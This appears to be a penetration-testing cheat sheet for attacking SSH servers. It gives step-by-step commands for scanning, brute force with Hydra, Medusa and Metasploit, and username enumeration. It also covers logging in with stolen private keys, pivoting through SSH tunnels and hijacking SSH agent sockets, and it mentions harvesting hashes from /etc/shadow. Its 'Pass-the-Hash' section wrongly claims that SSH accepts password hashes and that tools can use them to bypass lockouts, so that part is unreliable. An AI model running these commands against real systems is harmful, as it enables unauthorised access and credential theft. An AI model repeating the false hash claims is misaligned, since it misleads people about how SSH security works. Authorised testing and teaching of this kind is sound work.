SSH- Port 22

Basic Information

SSH (Secure Shell or Secure Socket Shell) is a network protocol that enables a secure connection to a computer over an unsecured network. It is essential for maintaining the confidentiality and integrity of data when accessing remote systems.

Default port: 22

Example Attack Workflow

Reconnaissance:

• Use Nmap to scan for open SSH ports. Port Scanning

• Identify the SSH version using nmap -sV. Service Enumeration

• Attempt to grab the SSH banner for more info (nc or telnet). Banner Grabbing

Vulnerability Assessment:

• Use ssh-audit to find weak configurations. Public Key Authentication Weaknesses

• Search for CVEs related to the detected SSH version. Check for Known Vulnerabilities

Brute-Force or Key Exploitation:

• If password authentication is used, attempt brute-forcing with Hydra or Medusa. Brute force

• If SSH keys are exposed, use the key to authenticate directly. Using Exposed SSH Keys to Authenticate Directly

Post-Exploitation:

• Set up SSH tunnels for lateral movement. Setting Up SSH Tunnels for Lateral Movement

• Hijack existing SSH sessions if possible. Hijacking Existing SSH Sessions

Reconnaissance

Port Scanning

Use Nmap to identify SSH ports (default is 22).

nmap -p22 <target-ip>

Service Enumeration

Check the SSH service version to identify potential vulnerabilities.

nmap -sV -p22 <target-ip>

Banner Grabbing

Extract the SSH banner to see the service version and OS information.

nc <target-ip> 22

Vulnerability Assessment

Check for Known Vulnerabilities

• Once you have the SSH version from the previous steps, you can search for known vulnerabilities (CVEs) in public databases like CVE Details, or automate the process using Nmap NSE scripts.

nmap --script sshv1 -p22 <target-ip>
nmap -p22 <ip> --script ssh2-enum-algos # Retrieve supported algorythms 
nmap -p22 <ip> --script ssh-hostkey --script-args ssh_hostkey=full # Retrieve weak keys
nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root" # Check authentication methods

Brute force

• Use Hydra, Medusa to attempt brute force attacks.

hydra -l <username> -P <password-list> <target-ip> ssh

medusa -h <target-ip> -u <username> -P <password-list> -M ssh

Advanced Brute Force Techniques

In more advanced penetration testing scenarios, attackers may leverage captured password hashes instead of brute-forcing plaintext passwords. This technique is known as Pass the Hash (PTH), and it allows attackers to authenticate using password hashes directly, bypassing traditional brute force limitations. Two common tools used for this purpose in the SSH context are CrackMapExec and pth-ssh.

Parallel SSH Brute-Forcing with CrackMapExec

CrackMapExec (CME) is a post-exploitation tool that can automate tasks across an entire network, including parallel brute-forcing of SSH login credentials. CME allows for simultaneous brute force attacks on multiple targets while leveraging password hashes in addition to plaintext passwords.

crackmapexec ssh <target-ip> -u <username> -p <password>

• <target-ip>: The IP address of the target machine.

• -u <username>: The username to attempt authentication with.

• -p <password>: The password or password list to use in the brute force attempt.

Pass-the-Hash with pth-ssh

Pass the Hash (PTH) attacks leverage stolen password hashes instead of trying to guess or brute-force plaintext passwords. pth-ssh is a tool specifically designed for SSH-based PTH attacks. It allows you to authenticate to an SSH service using a captured password hash, effectively bypassing password brute-force rate limiting or lockout mechanisms.

pth-ssh <username>@<target-ip> <password-hash>

• <username>: The username to attempt authentication with.

• <target-ip>: The IP address of the target machine.

• <password-hash>: The hash of the password that will be used to authenticate (instead of the plaintext password).

Why Use Pass-the-Hash (PTH) in SSH Attacks?

• Stealthier than Brute-Force Attacks: Brute force attempts can be noisy and trigger security alarms, whereas PTH attacks are often less detectable, as you're directly using a valid authentication hash.

• Bypass Rate Limits: Many SSH servers enforce rate limits or lockout periods after failed login attempts. Using PTH avoids these protections since the correct hash bypasses the normal authentication process.

• Post-Exploitation: In scenarios where you've already compromised a machine and retrieved password hashes (e.g., /etc/shadow file on Linux), PTH allows you to pivot across the network more quickly.

Where to Find Password Hashes?

• Post-Exploitation Tools: After initial access to a system, tools like Mimikatz, John the Ripper, or Hashcat can extract password hashes from memory, disk, or network traffic.

• Linux Systems: On Linux, password hashes are often stored in /etc/shadow (although the file is root-only).

• Windows Systems: Password hashes are stored in the SAM (Security Account Manager) database, and tools like Mimikatz can extract these for later use in PTH attacks.

Public Key Authentication Weaknesses

• If SSH key-based authentication is used, weak keys or poorly secured key files can be an entry point. Tools like ssh-audit can help find weaknesses in SSH configurations and exposed keys.

  Copy

  ssh-audit <target-ip>

Exploit Vulnerabilities

Exploiting Vulnerabilities (e.g., CVE-2018-15473)

Certain vulnerabilities like CVE-2018-15473 (username enumeration) allow attackers to discover valid usernames by analyzing SSH responses. Exploiting outdated ciphers or protocol flaws can also lead to successful attacks.

Metasploit for SSH Login Brute-Force:

use auxiliary/scanner/ssh/ssh_login
set RHOSTS <target-ip>
set USERNAME <username>
set PASS_FILE <path-to-password-list>
run

• use auxiliary/scanner/ssh/ssh_login: This module attempts to brute-force SSH credentials.

• RHOSTS <target-ip>: The target's IP address.

• USERNAME <username>: Username to brute-force.

• PASS_FILE <path-to-password-list>: File containing passwords.

Metasploit for SSH Version Enumeration:

use auxiliary/scanner/ssh/ssh_version
set RHOSTS <target-ip>
run

• use auxiliary/scanner/ssh/ssh_version: This module scans and detects the SSH version running on the target.

• RHOSTS <target-ip>: The IP address of the target system.

Additional Exploits:

CVE-2018-15473 allows username enumeration:

python ssh_enum.py <target-ip> -U <user-list>

This Python script attempts to enumerate valid usernames by analyzing SSH responses during login attempts.

CVE-2008-0166 (OpenSSL Debian Random Number Generator Vulnerability)

This is an older but critical vulnerability that affected Debian-based systems using OpenSSL, allowing attackers to guess private keys.

If the system is vulnerable to this, SSH keys can be recreated based on weak random numbers.

1. Download the key list for vulnerable Debian OpenSSL versions.

   Copy

   git clone https://github.com/g0tmi1k/debian-ssh.git

2. Search for the corresponding weak key.

   Copy

   cd debian-ssh
   ./find_key.py <target-ip> <username>

Default Credentials

Using Exposed SSH Keys to Authenticate Directly

If you have access to an exposed or stolen SSH private key (id_rsa), you can use it to authenticate directly to the SSH service of a target system.

Step-by-Step Instructions:

1. Obtain the SSH Private Key: The private key typically has the filename id_rsa. Ensure it has the correct permissions (600) before attempting to use it.

2. Check and Set Permissions: The SSH client requires that the private key file has restricted permissions (only the owner can read it). Set the correct permissions:

   Copy

   chmod 600 id_rsa

3. SSH Into the Target Using the Exposed Key: Use the following command to SSH into the target using the private key.

   Copy

   ssh -i id_rsa <username>@<target-ip>

   • id_rsa: The private key file you obtained.

   • <username>: The username for the SSH login.

   • <target-ip>: The IP address or hostname of the target system.

   Example:

   Copy

   ssh -i id_rsa [email protected]

4. Verify Access: If the key is valid and properly configured on the target, you should now have SSH access to the target system without needing to brute force credentials.

Post-Exploitation

Setting Up SSH Tunnels for Lateral Movement

SSH tunneling allows you to create an encrypted tunnel through the compromised machine to reach other machines on an internal network. This is useful for pivoting in post-exploitation scenarios.

Step-by-Step Instructions:

1. SSH Local Port Forwarding: This allows you to forward a local port on your machine to a port on another machine via the SSH server. It’s useful when you want to access an internal service.

   Command:

   Copy

   ssh -L <local-port>:<internal-ip>:<internal-port> <username>@<target-ip>

   • <local-port>: The port on your local machine that you want to use.

   • <internal-ip>: The internal IP address of the machine behind the SSH server you want to reach.

   • <internal-port>: The port on the internal machine that you want to access.

   • <username>@<target-ip>: Credentials and IP address of the compromised SSH server.

   Example:

   Copy

   ssh -L 8080:10.10.10.5:80 [email protected]

   This command forwards your local port 8080 to port 80 on the internal machine with IP 10.10.10.5. After this, you can access the internal server by going to http://localhost:8080 in your browser.

2. SSH Remote Port Forwarding: This method allows you to expose a port from your local machine to the target network. It’s useful for reverse shell setups.

   Command:

   Copy

   ssh -R <remote-port>:<local-ip>:<local-port> <username>@<target-ip>

   Example:

   Copy

   ssh -R 9000:localhost:22 [email protected]

   This will allow you to connect to your local SSH service (port 22) from the target machine via port 9000.

3. Dynamic SSH Tunneling with SOCKS Proxy: You can create a dynamic SSH tunnel using a SOCKS proxy, which allows you to route traffic through the SSH server to any machine inside the network.

   Command:

   Copy

   ssh -D <local-port> <username>@<target-ip>

   Example:

   Copy

   ssh -D 8080 [email protected]

   This creates a SOCKS proxy on localhost:8080. You can configure your browser or proxy-aware tool (like Burp Suite) to route traffic through this proxy.

Hijacking Existing SSH Sessions

In certain post-exploitation scenarios, it may be possible to hijack existing SSH sessions. This typically involves identifying and using SSH agent forwarding or hijacking a socket used by the active SSH session.

Step-by-Step Instructions:

1. Check for Active SSH Sessions: After gaining access to a system, you can check for active SSH sessions by looking for SSH processes.

   Command:

   Copy

   ps aux | grep ssh

   This will show the active SSH connections and the processes tied to them. You can also check the /proc directory for further details.

2. Check for SSH Agent Forwarding: If SSH agent forwarding is enabled, you may be able to impersonate the user and reuse their SSH session. Check for SSH agent sockets in the /tmp/ directory.

   Command:

   Copy

   env | grep SSH_AUTH_SOCK

   If you find an SSH_AUTH_SOCK, it indicates the presence of an SSH agent. The agent stores private keys in memory, and you can use these keys to authenticate to other systems.

3. Hijacking the SSH Agent: If you find the SSH agent socket, you can use it to impersonate the user.

   Command:

   Copy

   ssh-add -l

   This will list the keys that are currently available in the agent. If keys are listed, you can use them to access other systems.

4. Using Hijacked SSH Agent for Pivoting: With the SSH agent hijacked, you can SSH to other systems without needing the actual private key, as long as the agent is authorized on those systems.

   Command:

   Copy

   ssh -A <username>@<target-ip>

   Example:

   Copy

   ssh -A [email protected]

   This forwards your hijacked SSH agent to the new target system, allowing you to use the stored keys for authentication.

E - Book - SSH Penetration TestingBuy Me a Coffee